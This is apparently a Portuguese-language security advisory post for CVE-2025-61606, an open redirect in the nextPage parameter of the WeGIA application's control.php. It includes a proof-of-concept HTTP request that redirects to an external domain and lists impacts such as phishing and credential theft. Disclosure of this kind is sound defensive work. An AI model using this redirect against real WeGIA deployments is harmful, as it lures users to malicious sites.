Featured image of post CVE-2025-61606
Open Redirect Moderado WeGia Securança WebApp

CVE-2025-61606

Open Redirect

CVE-2025-61606: Vulnerabilidade de Open Redirect no parâmetro nextPage do endpoint control.php

Publicação CVE: https://www.cve.org/CVERecord?id=CVE-2025-61606

Resumo

Uma vulnerabilidade de Open Redirect foi identificada no endpoint control.php do aplicativo WeGIA, especificamente no parâmetro nextPage (metodo=listarUm nomeClasse=FuncionarioControle).

Essa vulnerabilidade permite que invasores redirecionem usuários para domínios externos arbitrários, possibilitando campanhas de phishing, distribuição de payload malicioso ou roubo de credenciais de usuários.

Detalhes

«p style=“text-align: justify;">O aplicativo falha ao validar e sanitizar a entrada do usuário no parâmetro nextPage.

Como resultado, invasores podem criar URLs maliciosas que redirecionam os usuários para sites externos fora do domínio confiável, minando a confiança do usuário e possibilitando ataques de engenharia social.

Endpoint vulnerável: GET metodo=listarUm&nomeClasse=FuncionarioControle&nextPage=https%3A%2F%2Fgoogle.com&id_funcionario=2

Parâmetro: nextPage

PoC

Request:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

GET /WeGIA/controle/control.php?metodo=listarUm&nomeClasse=FuncionarioControle&nextPage=https%3A%2F%2Fgoogle.com&id_funcionario=2 HTTP/1.1
Host: sec.wegia.org:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Referer: https://sec.wegia.org:8000/WeGIA/html/funcionario/informacao_funcionario.php
Cookie: {COOKIE}
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

O servidor aceita a solicitação elaborada e redireciona com sucesso a vítima para https://google.com em vez de restringir a navegação ao domínio do próprio aplicativo.

Impacto

  • Phishing: Invasores podem induzir usuários a visitar sites maliciosos que imitam sites legítimos.
  • Roubo de credenciais: Páginas de login falsas podem capturar credenciais de usuários.
  • Distribuição de malware: As vítimas podem ser redirecionadas para sites que hospedam software malicioso.
  • Danos à reputação: Os usuários podem perder a confiança na plataforma Wegia se forem vítimas de abuso em campanhas de phishing.

Referência

https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-m64v-hm7q-33wr

Encontrado por

Marcelo Queiroz

By: CVE-Hunters

© 2020 - 2025 CVE-Hunters
Built with Hugo
Theme Stack designed by Jimmy